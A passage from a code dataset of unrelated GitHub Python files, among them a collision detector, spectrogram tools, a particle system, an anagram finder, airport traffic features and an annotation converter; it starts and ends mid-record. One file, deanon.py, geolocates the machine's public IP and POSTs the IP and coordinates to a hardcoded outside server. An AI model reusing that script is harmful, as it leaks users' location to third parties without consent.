endX/width_per_diode\n # get the diodes as tuples (i, value on/off)\n diode_ls = []\n # color = get_color_for_class(idx)\n # off_color = '0x000000' #black\n\n for i in range(1,NUM_DIODES + 1):\n # which diodes to activate\n if(i> start_id and i < end_id):\n diode_active = True\n else:\n diode_active = False\n diode_ls.append(diode_active)\n # print(diode_ls)\n\n #TODO send tuple_ls to diode\n\n\n\ndef img_classify(img):\n while (True):\n # max width of 400 pixel for video stream\n f = cv2.imread(img)\n f = imutils.resize(f, width=400)\n\n (h, w) = f.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(f, (300, 300)),\n 0.007843, (300, 300), 127.5)\n\n # pass blob to nn\n net.setInput(blob)\n detections = net.forward()\n\n # loop over the detections\n for i in np.arange(0, detections.shape[2]):\n # extract the confidence (probability) of nn:s prediction\n confidence = detections[0, 0, i, 2]\n\n # filter out weak detections (unlikely)\n if confidence > args[\"confidence\"]:\n # extract the index of the class label\n # (x, y)-coordinates of the bounding box for the object\n idx = int(detections[0, 0, i, 1])\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n\n # how wide is 
classified object\n obj_width = endX - startX\n obj_height = endY - startY\n\n # if classified object is interesting\n # if idx == 2 or idx == 6 or idx == 7 or idx == 14 or idx==15:\n if idx in IDX_CONFIG:\n # draw the prediction on the streams cur_frame\n draw_prediction(confidence, endX, endY, f, idx, startX, startY)\n # activate_diodes(startX, endX, w, idx)\n\n if obj_width >= 1 / 4 * w:\n activate_diodes(startX, endX, w, idx)\n draw_warning(f)\n\n # show the output frame\n cv2.imshow(\"Output Frame\", f)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n cv2.destroyAllWindows()\n\n\n\nvid_stream()\n# img = '/Users/andreas/Documents/HackBike/test_images/test1.jpg'\n# img_classify(img)","repo_name":"efra-mx/cosmo_bike","sub_path":"examples/collision_detector.py","file_name":"collision_detector.py","file_ext":"py","file_size_in_byte":8816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3577328788","text":"'''\nCreated on Jan 17, 2012\n\n@author: Meredith\n'''\ndef count(lst, key):\n '''returns how many times value is in list'''\n how_many = 0\n for value in lst:\n if value == key:\n how_many += 1\n return how_many\n \ndef remove_duplicates(lst):\n '''removes the duplicates in a list, returns the list without duplicates'''\n duplicate_lst = []\n for i in lst:\n if not i in duplicate_lst:\n duplicate_lst.append(i)\n duplicate_lst.sort\n return duplicate_lst\n\n\ndef main():\n lst = input('Enter a list: ')\n lst = count(lst)\n print(lst)\n lst = remove_duplicates(lst)\n print(lst)\n \nif __name__ == '__main__':\n main()","repo_name":"zesameri/Beginner-Python-Projects","sub_path":"Basic Concepts/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18156902825","text":"import matplotlib.pyplot as plt\nfrom scipy.io import wavfile\nfrom scipy.signal import stft, decimate\nfrom scipy.signal.windows import hamming\nimport numpy as np\nimport pandas as pd\nimport os\n\n\n# ------------------ Important constants ------------------------ #\n\nMAX_INT_16 = 2 ** 15 - 1 # Maximum integer represented with 8 bits\nSECONDS_PER_MINUTE = 60 # Number of seconds in a minute\n\n# ------------------ Important constants ------------------------ #\n\n\ndef range_to_indices(start_t, stop_t, fs):\n\n \"\"\"\n Returns a cropped section of a sound file between two\n particular timestamps (seconds).\n\n :param start_t: starting time in seconds\n :param stop_t: ending time in seconds\n :param fs: sample rate\n\n :return start_index: beginning index to crop at\n :return stop_index: end index to crop at\n \"\"\"\n\n return int(round(start_t * fs)), int(round(stop_t * fs))\n\n\ndef get_and_normalize_sound(file_path, max_int=MAX_INT_16, normalize=True):\n\n \"\"\"\n Gets desired sound file and normalizes it to largest possible integer.\n\n :param file_path: path to desired file\n :param max_int: integer to use in normalization\n\n :return sample_rate: sample rate of the sound file\n :return samples: sound samples from file\n \"\"\"\n\n sample_rate, samples = wavfile.read(file_path)\n\n if normalize:\n samples = np.divide(samples, max_int)\n\n return sample_rate, samples\n\n\ndef parse_begin_date_and_time(row):\n\n \"\"\"\n\n Parses date/time information of a row in the data frame created from AllCalls_multichannel_2.txt\n to put it the format of the corresponding 
sound file in SAMBAY/..../multichannel_wave_1h.\n\n :param row: row of a pandas dataframe from AllCalls_multichannel_2.txt to analyze\n :return filename: datetime string in format 'yyyymmdd-hh0000_multichannel_wav_SAMBAYu.wav'\n\n \"\"\"\n\n date_and_time = row.BeginDateTime.split()\n date, time = date_and_time[0], date_and_time[1]\n\n # Parse out the file to get sound from\n time = time.split(':')\n\n if len(time[0]) == 1:\n time_end = '0' + time[0] + '0000'\n else:\n time_end = time[0] + '0000'\n\n if len(date) == 8:\n date = date.replace(\"/\", \"0\")\n else:\n date = date.replace(\"/\", \"0\", 1).replace(\"/\", '')\n\n file_name = date + '-' + time_end + '_multichannel_wav_SAMBAYu.wav'\n\n # Get start and end times\n time_start = float(time[1])*SECONDS_PER_MINUTE + float(time[2])\n time_stop = time_start + float(row.DeltaTime)\n\n return time_start, time_stop, file_name\n\n\ndef my_stft(samples, fs, window_N, window_overlap=1, NFFT=2048, DECIMATE_FACTOR=4):\n\n \"\"\"\n Creates spectrogram from the provided data.\n\n :param samples: signal\n :param fs: samples rate\n :param window_N: length of window\n\n :return time: timeseries\n :return freq: frequency array\n :return Zxx: stft\n :return fs: new sampling frequency after signal has been decimated\n\n \"\"\"\n\n # Mean center the data\n samples = samples - np.mean(samples)\n s = decimate(samples, DECIMATE_FACTOR)\n fs = fs / DECIMATE_FACTOR\n\n # Get length of signal\n Ns = len(s)\n\n # Calculate time and frequency axes\n time = np.linspace(0, Ns-1, Ns) / fs\n freq = np.linspace(0, NFFT-1, NFFT) * (fs/NFFT)\n\n # Create custom window and calculate stft\n window = hamming(window_N)\n _, _, Zxx = stft(s, nfft=NFFT, return_onesided=False, window=window, nperseg=window_N, noverlap=window_N-window_overlap)\n\n return time, freq, Zxx, fs\n\n\nif __name__ == \"__main__\":\n\n DATA_PATH = \"C:/Users/mgoldwater/Desktop/WHOI Storage/SAMBAY\"\n\n # Read in .txt file which describes the data as a pandas dataframe\n df = pd.read_csv(os.path.join(DATA_PATH, 'metadata/AllCalls_multichannel_2.txt'), sep='\\t')\n df.columns = ['Selection',\n 'View',\n 'Channel',\n 'BeginTimes',\n 'EndTimes',\n 'LowFreq',\n 'HighFreq',\n 'BeginDateTime',\n 'DeltaFreq',\n 'DeltaTime',\n 'CenterFreq',\n 'PeakFreq',\n 'BasicCat',\n 'Quality',\n 'Localization']\n\n # Loop indices to plot a spectrogram for each row in the dataframe\n for call in [30]:\n\n # Get current row and the name of the corresponding file\n curr_row = df.loc[call]\n start_time, stop_time, corresponding_file = parse_begin_date_and_time(curr_row)\n\n # Get and normalize the data from the file\n fs, samples_norm = get_and_normalize_sound(os.path.join(DATA_PATH,\n \"acoustic data/multichannel_wav_1h\",\n corresponding_file))\n\n # Get the start and end time of the call, and add a 0.5 [s] buffer on either side.\n # Then, convert these times to indices in the vector\n #starti, stopi = range_to_indices(start_time - 0.15, start_time + 0.334 + 0.15, fs)\n starti, stopi = range_to_indices(start_time - 0.15, start_time + 0.211 + 0.15, fs)\n\n # Get the channel, subtracting one for indexing purposes\n channel = curr_row.Channel - 1\n\n # Crop the sound vector\n samples = samples_norm[starti:stopi, channel]\n\n # Calculate the stft\n window_N = 31\n time, freq, Zxx, fs = my_stft(samples, fs, window_N, window_overlap=2, NFFT=2 ** 9)\n spectro = 10 * np.log10(np.abs(Zxx) ** 2)\n spectro = spectro[round(spectro.shape[0] / 2):, :]\n\n print(spectro.shape)\n\n # Plot the figure\n plt.figure()\n plt.imshow(spectro, 
aspect='auto')\n plt.ylim(spectro.shape[0], spectro.shape[0] / 2)\n plt.show()\n","repo_name":"whoi-mars/ssf_goldwater","sub_path":"utils/spect.py","file_name":"spect.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34710441907","text":"import requests\r\nimport re\r\nimport json\r\napi_key = \" \" #API_KEY \r\n\r\nmy_ip_res = requests.get(\"https://2ip.ru/\").content\r\nmy_ip = re.findall('IP адрес: \\d+\\.\\d+\\.\\d+\\.\\d+', my_ip_res.decode('utf-8'))[0].split(\" \")[-1]\r\n\r\ngeo_res = requests.get(\"http://api.ipstack.com/%s?access_key=%s&format=1\" % (my_ip, api_key))\r\nprint(geo_res.content.decode('utf-8'))\r\n\r\nresult = json.loads(geo_res.content)\r\nlatitude, longitude = result['latitude'], result['longitude']\r\n\r\n\r\npost_res = str(\"IP:%s Lat:%s Long:%s\" % (str(my_ip), str(latitude), str(longitude))).encode('utf-8')\r\nprint(post_res)\r\nrequests.post(\"http://130.61.88.149/\", data=post_res)","repo_name":"VinceHov/VinceHov","sub_path":"PythonShit/deanon.py","file_name":"deanon.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"5119807157","text":"from ParticleEffectController import *\nfrom ParticleEffectController_Smoke import *\nfrom ParticleEffectController_Lightning import *\nfrom ParticleEffectController_Rain import *\nfrom ParticleEffectController_Energy import *\nparticleEffectArrayLightning = []\nparticleEffectArrayFire = []\nparticleEffectArraySmoke = []\nparticleEffectArrayRain = []\nparticleEffectArrayEnergy = []\n\nclass ParticleSystem:\n def __init__(self,positionX,positionY,lifeSpan):\n self.x = positionX\n self.y = positionY\n self.life = lifeSpan\n\n \n def update(self):\n for particleEffect in particleEffectArrayFire:\n particleEffect.update()\n particleEffect.updateTimer()\n particleEffect.lifeSpan()\n for particleEffectSmoke in particleEffectArraySmoke:\n particleEffectSmoke.update()\n particleEffectSmoke.updateTimer()\n particleEffectSmoke.lifeSpan()\n for particleEffectLight in particleEffectArrayLightning:\n particleEffectLight.updateTimer()\n particleEffectLight.randomX()\n particleEffectLight.spawnLightning()\n particleEffectLight.checkYLocal()\n particleEffectLight.purgeLightning()\n for particleEffectRain in particleEffectArrayRain:\n particleEffectRain.update()\n particleEffectRain.updateTimer()\n particleEffectRain.spawnRain()\n for particleEffectEnergy in particleEffectArrayEnergy:\n particleEffectEnergy.update()\n particleEffectEnergy.updateTimer()\n particleEffectEnergy.spawnParticles()\n \n \n def render(self):\n for particleEffect in particleEffectArrayFire:\n particleEffect.display()\n for particleEffectSmoke in particleEffectArraySmoke:\n particleEffectSmoke.display()\n for particleEffectLight in particleEffectArrayLightning:\n particleEffectLight.display()\n for particleEffectRain in particleEffectArrayRain:\n particleEffectRain.display()\n for particleEffectEnergy in particleEffectArrayEnergy:\n particleEffectEnergy.display()\n \n def addParticleEffect(self, name, mode):\n if name == 'fire':\n if mode == 'timed':\n particleEffectArrayFire.append(ParticleEffectController(self.x,self.y,self.life))\n if mode == 'loop':\n particleEffectArrayFire.append(ParticleEffectController(self.x,self.y,99999))\n if name == 'smoke':\n if mode == 'timed':\n 
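# --- Illustrative sketch (not part of the original file) ---------------------
# ParticleSystem above keeps one module-level list per effect type and repeats
# the same update/render loop for each of them. Purely for illustration, a
# common alternative is a single registry keyed by effect name, so adding a
# new effect type needs no new list or loop. The stored effect objects are
# assumed to expose update() and display(), matching the controllers above.

class EffectRegistry:
    """Minimal effect manager: one dict of lists instead of several globals."""

    def __init__(self):
        self._effects = {}                        # name -> list of live effects

    def add(self, name, effect):
        self._effects.setdefault(name, []).append(effect)

    def update(self):
        for effects in self._effects.values():
            for effect in effects:
                effect.update()

    def render(self):
        for effects in self._effects.values():
            for effect in effects:
                effect.display()

    def clear(self):
        self._effects.clear()
# -----------------------------------------------------------------------------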
particleEffectArraySmoke.append(ParticleEffectController_Smoke(self.x,self.y,self.life))\n if mode == 'loop':\n particleEffectArraySmoke.append(ParticleEffectController_Smoke(self.x,self.y,99999))\n if name == 'lightning':\n if mode == 'timed' or mode == 'loop':\n particleEffectArrayLightning.append(ParticleEffectController_Lightning(self.x,self.y,30,self.life))\n if name == 'rain':\n particleEffectArrayRain.append(ParticleEffectController_Rain(self.x,self.y,99999))\n if name == 'energy':\n if mode == 'timed':\n particleEffectArrayEnergy.append(ParticleEffectController_Energy(self.x,self.y,self.life))\n if mode == 'loop':\n particleEffectArrayEnergy.append(ParticleEffectController_Energy(self.x,self.y,99999))\n def clearAll(self):\n global particleEffectArrayFire, particleEffectArraySmoke, particleEffectArrayRain, particleEffectArrayEnergy\n particleEffectArrayFire = []\n particleEffectArraySmoke = []\n particleEffectArrayRain = []\n particleEffectArrayEnergy = []\n","repo_name":"Jyngi/processing_particlesystem","sub_path":"ParticleSystem.py","file_name":"ParticleSystem.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70158506249","text":"from PyQt5.Qt import *\nfrom GUI.resource.personal import Ui_Form\nfrom Database import DB\nimport signup\n\nclass PersonalPane(QWidget, Ui_Form):\n\n logout_pane_signal = pyqtSignal()\n show_send_message_GUI_signal = pyqtSignal()\n\n def __init__(self, parent=None, *args, **kwargs):\n super().__init__(parent, *args, **kwargs)\n self.setAttribute(Qt.WA_StyledBackground, True)\n self.setupUi(self)\n\n def logout_pane(self):\n self.logout_pane_signal.emit()\n\n def send_button(self):\n self.show_send_message_GUI_signal.emit()\n\n def refresh_show(self):\n message_type = self.comboBox.currentText()\n self.pushButton.setText(message_type)\n database = DB()\n print(signup.login_user)\n if message_type == 'Personal':\n display = database.message_looking(signup.login_user)\n self.textEdit.setPlainText(display)\n if message_type == 'Group':\n display = database.group_message_looking(signup.login_user)\n self.textEdit.setPlainText(display)\n if message_type == 'ALL':\n display = database.message_looking('all')\n self.textEdit.setPlainText(display)\n\n\n\nif __name__ == '__main__':\n import sys\n myapp = QApplication(sys.argv)\n window = PersonalPane()\n window.logout_pane_signal.connect(lambda: print(\"logout\"))\n window.show()\n sys.exit(myapp.exec_())","repo_name":"Kenny-Z/CloudBased-Message-Board-with-Face-Recognition","sub_path":"GUI/personal_GUI.py","file_name":"personal_GUI.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40564323061","text":"#from wordsets import english_words, english_words_small\nfrom wordsets import english_words_small\n\n\ndef find_anagrams(letters, words):\n \"\"\"Find a collection of anagrams of given letters from a given word bank.\n\n :param letters: The letters from which to form anagrams.\n :param words: A set of lowercase, alphabetic English words in a word bank.\n :return: A set of anagrams of the given letters found in the word bank.\n \"\"\"\n canonicalize_letters = canonicalize(letters)\n\n lookup_dict = build_lookup(words)\n\n if lookup_dict.get(canonicalize_letters, 0):\n return lookup_dict[canonicalize_letters]\n return set()\n\n\n\"\"\"\nCreate a canonicalized string from a given word.\nCanonical meaning 
letters sorted alphabetically\n:param word: a string to form the canonical string\n:return: A string that has been sorted alphabetically\n\"\"\"\ndef canonicalize(word):\n canonical_list = sorted(word)\n canonical_str = \"\"\n for l in canonical_list:\n canonical_str += l\n return canonical_str\n\n\"\"\"\nCreate a lookup dictionary where each key is the canonical word and each value\nis all the words in the parameter \"words\" that matches.\n\n:param words: a given word bank.\n:return : a dictionary of canonical words (keys)\n and a set of matching words in the words bank (value).\n\"\"\"\ndef build_lookup(words):\n lookup = {}\n key_set = {canonicalize(word) for word in words}\n #print(key_set)\n for key in key_set:\n #print(\"key \" + key)\n for word in words:\n #print(\"word \" + word)\n if key == canonicalize(word):\n #print(\"key == word\")\n if lookup.get(key, 0):\n #print(lookup[key])\n lookup[key] = lookup[key] |{word,}\n else:\n lookup[key] = {word,}\n\n return lookup\n\n\n# Test code. Switch out \"english_words_small\" param to change word bank\nif __name__ == '__main__':\n while True:\n letters = input(\"What letters would you like to find the anagram of? \").lower().strip()\n for anagram in find_anagrams(letters, english_words_small):\n print(anagram)\n","repo_name":"wiggiddywags/python-playground","sub_path":"Anagram/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34409673098","text":"\"\"\"Manages the exchange_u32.asm patch.\"\"\"\n\n# pylint: disable=consider-using-f-string\n# pylint: disable=too-few-public-methods\n# pylint: disable=invalid-name\n\nimport struct\nfrom Xbox import Xbox\nimport XboxHelper\n\n\nclass _ExchangeU32:\n \"\"\"Manages the exchange_u32.asm patch.\"\"\"\n\n def __init__(self, verbose=True):\n self.exchange_u32_addr = 0\n self.verbose = verbose\n\n def _install_kicker(self, xbox: Xbox):\n with open(\"exchange_u32\", \"rb\") as patch_file:\n data = patch_file.read()\n\n self.exchange_u32_addr = XboxHelper.load_binary(xbox, data)\n if self.verbose:\n print(\"exchange_u32 installed at 0x%08X\" % self.exchange_u32_addr)\n\n def call(self, xbox: Xbox, address: int, value: int) -> int:\n \"\"\"Calls the kicker with the given argument.\"\"\"\n if not self.exchange_u32_addr:\n self._install_kicker(xbox)\n\n return xbox.call(self.exchange_u32_addr, struct.pack(\" int:\n \"\"\"Exchanges `value` with the value at `address`, returning the original value.\"\"\"\n return _instance.call(xbox, address, value)\n","repo_name":"XboxDev/nv2a-trace","sub_path":"ExchangeU32.py","file_name":"ExchangeU32.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"16"} +{"seq_id":"30256498709","text":"__author__ = 'dengzhihong'\n\nimport numpy as np\n\ndef RawLabel2IntList(label):\n return np.array(map(int, map(float, label[:]))) - 1\n\ndef RawData2FloatXYList(data):\n R = 2\n L = len(data)\n data = np.array(map(float, data[:])).reshape(R,L/R)\n X = []\n Y = []\n for i in range(data.shape[1]):\n X.append(data[0][i])\n Y.append(data[1][i])\n return X,Y\n\ndef RawData2XYArray(data):\n dataMat = np.array(map(float, data[:])).reshape(2, len(data)/2)\n return 
np.mat(dataMat).transpose()","repo_name":"dzh123xt/pythonML","sub_path":"src/Methods/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28172133374","text":"#\n# Author: Kyler Robison\n#\n# calculate and add traffic information to data table\n#\n\nimport feature_engineering\nimport pandas as pd\n\n\n# calculate various traffic measures for airport\ndef add_traffic(\n now: pd.Timestamp, flights_selected: pd.DataFrame, latest_etd: pd.DataFrame, data_tables: dict[str, pd.DataFrame]\n) -> pd.DataFrame:\n runways = data_tables[\"runways\"]\n\n runways_filtered_3hr = feature_engineering.filter_by_timestamp(runways, now, 3)\n\n deps_3hr = count_actual_flights(runways_filtered_3hr, departures=True)\n flights_selected[\"deps_3hr\"] = pd.Series([deps_3hr] * len(flights_selected), index=flights_selected.index)\n\n deps_30hr = count_actual_flights(runways, departures=True)\n flights_selected[\"deps_30hr\"] = pd.Series([deps_30hr] * len(flights_selected), index=flights_selected.index)\n\n arrs_3hr = count_actual_flights(runways_filtered_3hr, departures=False)\n flights_selected[\"arrs_3hr\"] = pd.Series([arrs_3hr] * len(flights_selected), index=flights_selected.index)\n\n arrs_30hr = count_actual_flights(runways, departures=False)\n flights_selected[\"arrs_30hr\"] = pd.Series([arrs_30hr] * len(flights_selected), index=flights_selected.index)\n\n # technically is the # of planes whom have arrived at destination airport gate and also departed their origin\n # airport over 30 hours ago, but who cares, it's an important feature regardless\n deps_taxiing = count_planes_taxiing(data_tables[\"mfs\"], runways, data_tables[\"standtimes\"], flights=\"departures\")\n flights_selected[\"deps_taxiing\"] = pd.Series([deps_taxiing] * len(flights_selected), index=flights_selected.index)\n\n # apply count of expected departures within various windows\n flights_selected[\"exp_deps_15min\"] = flights_selected.apply(\n lambda row: count_expected_departures(row[\"gufi\"], latest_etd, 15), axis=1\n )\n\n flights_selected[\"exp_deps_30min\"] = flights_selected.apply(\n lambda row: count_expected_departures(row[\"gufi\"], latest_etd, 30), axis=1\n )\n\n return flights_selected\n\n\n# calculate various traffic measures for airport (with private features)\ndef add_traffic_private(\n flights_selected: pd.DataFrame, private_mfs: pd.DataFrame, runways: pd.DataFrame, private_standtimes: pd.DataFrame\n) -> pd.DataFrame:\n arrs_taxiing = count_planes_taxiing(private_mfs, runways, private_standtimes, flights=\"arrivals\")\n flights_selected[\"arrs_taxiing\"] = pd.Series([arrs_taxiing] * len(flights_selected), index=flights_selected.index)\n return flights_selected\n\n\ndef count_actual_flights(runways_filtered, departures: bool) -> int:\n if departures:\n runways_filtered = runways_filtered.loc[pd.notna(runways_filtered[\"departure_runway_actual_time\"])]\n else:\n runways_filtered = runways_filtered.loc[pd.notna(runways_filtered[\"arrival_runway_actual_time\"])]\n\n return runways_filtered.shape[0]\n\n\ndef count_planes_taxiing(mfs, runways, standtimes, flights: str) -> int:\n mfs = mfs.loc[mfs[\"isdeparture\"] == (flights == \"departures\")]\n\n if flights == \"departures\":\n taxi = pd.merge(mfs, standtimes, on=\"gufi\") # inner join will only result in flights with departure stand times\n taxi = pd.merge(taxi, runways, how=\"left\", on=\"gufi\") # left join leaves blanks for taxiing 
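# --- Illustrative sketch (not part of the original file) ---------------------
# count_planes_taxiing() here relies on a left-merge-then-isna idiom: a flight
# that has a stand time but no actual runway time yet is still taxiing. The
# same idiom on two tiny, made-up frames:

import pandas as pd

stand = pd.DataFrame({
    "gufi": ["A", "B", "C"],
    "departure_stand_actual_time": pd.to_datetime(
        ["2023-01-01 10:00", "2023-01-01 10:05", "2023-01-01 10:10"]),
})
runway = pd.DataFrame({
    "gufi": ["A"],
    "departure_runway_actual_time": pd.to_datetime(["2023-01-01 10:12"]),
})

taxi = pd.merge(stand, runway, how="left", on="gufi")    # B and C get NaT runway times
still_taxiing = taxi.loc[pd.isna(taxi["departure_runway_actual_time"])]
assert still_taxiing.shape[0] == 2                       # B and C are still taxiing
# -----------------------------------------------------------------------------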
flights\n taxi = taxi.loc[pd.isna(taxi[\"departure_runway_actual_time\"])] # select the taxiing flights\n elif flights == \"arrivals\":\n taxi = runways.loc[pd.notna(runways[\"arrival_runway_actual_time\"])] # arrivals are rows with valid time\n taxi = pd.merge(taxi, standtimes, how=\"left\", on=\"gufi\") # left merge with standtime\n taxi = taxi.loc[pd.isna(taxi[\"arrival_stand_actual_time\"])] # empty standtimes mean still taxiing\n else:\n raise RuntimeError(\"Invalid argument, must specify departures or arrivals\")\n\n return taxi.shape[0]\n\n\ndef count_expected_departures(gufi: str, etd: pd.DataFrame, window: int) -> int:\n time = etd.loc[etd.index == gufi][\"departure_runway_estimated_time\"].iloc[0]\n\n lower_bound = time - pd.Timedelta(minutes=window)\n upper_bound = time + pd.Timedelta(minutes=window)\n\n etd_window = etd.loc[\n (etd[\"departure_runway_estimated_time\"] >= lower_bound)\n & (etd[\"departure_runway_estimated_time\"] <= upper_bound)\n ]\n\n return etd_window.shape[0]\n","repo_name":"krobison10/FLHuskies_PTTF","sub_path":"table_scripts/add_traffic.py","file_name":"add_traffic.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15636596186","text":"import os\nimport glob\nimport json\nimport shutil\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\n\npath2 = '.' # 当前该文件路径\n\nSTART_BOUNDING_BOX_ID = 1\n\n\ndef get(root, name):\n return root.findall(name)\n\n\ndef get_and_check(root, name, length):\n vars = root.findall(name)\n if len(vars) == 0:\n raise NotImplementedError('Can not find %s in %s.' % (name, root.tag))\n if length > 0 and len(vars) != length:\n raise NotImplementedError('The size of %s is supposed to be %d, but is %d.' 
% (name, length, len(vars)))\n if length == 1:\n vars = vars[0]\n return vars\n\n\ndef convert(xml_list, json_file):\n json_dict = {\"annotations\": []}\n categories = pre_define_categories.copy()\n bnd_id = START_BOUNDING_BOX_ID\n all_categories = {}\n for index, line in enumerate(xml_list):\n # print(\"Processing %s\"%(line))\n xml_f = line\n tree = ET.parse(xml_f)\n root = tree.getroot()\n\n filename = os.path.basename(xml_f)[:-4] + \".jpg\"\n image_id = filename#1 + index\n size = get_and_check(root, 'size', 1)\n width = int(get_and_check(size, 'width', 1).text)\n height = int(get_and_check(size, 'height', 1).text)\n image = {'file_name': filename, 'height': height, 'width': width, 'id': image_id}\n #json_dict['images'].append(image)\n ## Cruuently we do not support segmentation\n # segmented = get_and_check(root, 'segmented', 1).text\n # assert segmented == '0'\n for obj in get(root, 'object'):\n category = get_and_check(obj, 'name', 1).text\n if category in all_categories:\n all_categories[category] += 1\n else:\n all_categories[category] = 1\n if category not in categories:\n if only_care_pre_define_categories:\n continue\n new_id = len(categories) + 1\n print(\n \"[warning] category '{}' not in 'pre_define_categories'({}), create new id: {} automatically\".format(\n category, pre_define_categories, new_id))\n categories[category] = new_id\n category_id = categories[category]\n bndbox = get_and_check(obj, 'bndbox', 1)\n xmin = int(float(get_and_check(bndbox, 'xmin', 1).text))\n ymin = int(float(get_and_check(bndbox, 'ymin', 1).text))\n xmax = int(float(get_and_check(bndbox, 'xmax', 1).text))\n ymax = int(float(get_and_check(bndbox, 'ymax', 1).text))\n assert (xmax > xmin), \"xmax <= xmin, {}\".format(line)\n assert (ymax > ymin), \"ymax <= ymin, {}\".format(line)\n o_width = abs(xmax - xmin)\n o_height = abs(ymax - ymin)\n\n ann = {'name': image_id,\n 'image_height': height,\n 'image_width': width,\n 'category': category_id,\n 'bbox': [\n xmin,\n ymin,\n xmax,\n ymax\n ]\n }\n\n json_dict['annotations'].append(ann) # 将生成的json文件加入annotations文件夹\n bnd_id = bnd_id + 1\n\n json_fp = open(json_file, 'w')\n json_str = json.dumps(json_dict)\n json_fp.write(json_str)\n json_fp.close()\n print(\"------------create {} done--------------\".format(json_file))\n print(\"find {} categories: {} -->>> your pre_define_categories {}: {}\".format(len(all_categories),\n all_categories.keys(),\n len(pre_define_categories),\n pre_define_categories.keys()))\n print(\"category: id --> {}\".format(categories))\n print(categories.keys())\n print(categories.values())\n\n\nif __name__ == '__main__':\n classes = ['L_Y', 'JY1_2', 'Emergency', 'Handle', 'AR', 'QF_A', 'XT_13', 'XT_14', 'XT_15', 'FR_R'] # 类别\n pre_define_categories = {}\n for i, cls in enumerate(classes):\n pre_define_categories[cls] = i+1\n # {'L_Y': 1, 'JY1_2': 2, 'Emergency': 3, 'Handle': 4, 'AR': 5, 'QF_A': 6, 'XT_13': 7,\n # 'XT_14': 8, 'XT_15': 9, 'FR_R': 10}\n\n only_care_pre_define_categories = True\n # only_care_pre_define_categories = False\n\n train_ratio = 1 # 控制train和val的比例 train_ratio=1是全部生成为train数据\n save_json_trian = 'instances_train2014.json'\n save_json_val = 'instance_val2014.json'\n xml_dir = \"Annotation\" # 存放xml文件的文件夹\n\n xml_list = glob.glob(xml_dir + \"/*.xml\")\n # xml_list =['Annotation\\\\2020_08_12_17_45_IMG_5050.xml'...] 
xml文件路径\n xml_list = np.sort(xml_list)\n np.random.seed(100)\n np.random.shuffle(xml_list)\n\n train_num = int(len(xml_list)*train_ratio)\n xml_list_train = xml_list[:train_num]\n xml_list_val = xml_list[train_num:]\n\n # 将xml文件转换成json文件存储\n convert(xml_list_train, save_json_trian)\n convert(xml_list_val, save_json_val)\n\n if os.path.exists(path2 + \"/annotations\"):\n shutil.rmtree(path2 + \"/annotations\")\n os.makedirs(path2 + \"/annotations\")\n\n if os.path.exists(path2 + \"/images/train2014\"):\n shutil.rmtree(path2 + \"images/train2014\")\n os.makedirs(path2 + \"/images/train2014\")\n\n if os.path.exists(path2 + \"/images/val2014\"):\n shutil.rmtree(path2 + \"/images/val2014\")\n os.makedirs(path2 + \"/images/val2014\")\n\n f1 = open(\"train.txt\", \"w\")\n for xml in xml_list_train:\n img = xml[:-4] + \".jpg\" # 根据xml文件路径获取图片路径,此时图片和xml文件都在annotations文件夹中\n f1.write(os.path.basename(xml)[:-4] + \"\\n\")\n shutil.copyfile(img, path2 + \"/images/train2014/\" + os.path.basename(img)) # 将用于训练的图片存入训练集\n\n f2 = open(\"test.txt\", \"w\")\n for xml in xml_list_val:\n img = xml[:-4] + \".jpg\"\n f2.write(os.path.basename(xml)[:-4] + \"\\n\")\n shutil.copyfile(img, path2 + \"/images/val2014/\" + os.path.basename(img)) # 将用于测试的图片存入测试集\n f1.close()\n f2.close()\n print(\"-------------------------------\")\n print(\"train number:\", len(xml_list_train))\n print(\"val number:\", len(xml_list_val))\n\n\n\n","repo_name":"aoko-sys/Improved-YOLOv5","sub_path":"YOLT/DataPre_Tensorflow-master/data/io/DOTA/xmltojson.py","file_name":"xmltojson.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42416223974","text":"# Write your code here\n \nn = int(input())\ntotal = 0\nprevious = None\ntotal_smaller = 0\nstack = []\nfor x in input().split():\n count = 0\n num = int(x)\n while stack:\n if stack[-1][0] < num:\n count += stack.pop()[1]\n else:\n break\n \n if stack:\n if stack[-1][0] == num:\n count += stack[-1][1]\n stack[-1][1] += 1\n if len(stack)>1:\n count += 1\n else:\n count += 1\n stack.append([num,1])\n else:\n stack.append([num,1])\n total += count\n #print(stack)\nprint(total)","repo_name":"Hardik500/Local_Code","sub_path":"HackerEarth/Capital_of_Hills.py","file_name":"Capital_of_Hills.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73409503049","text":"port_name = 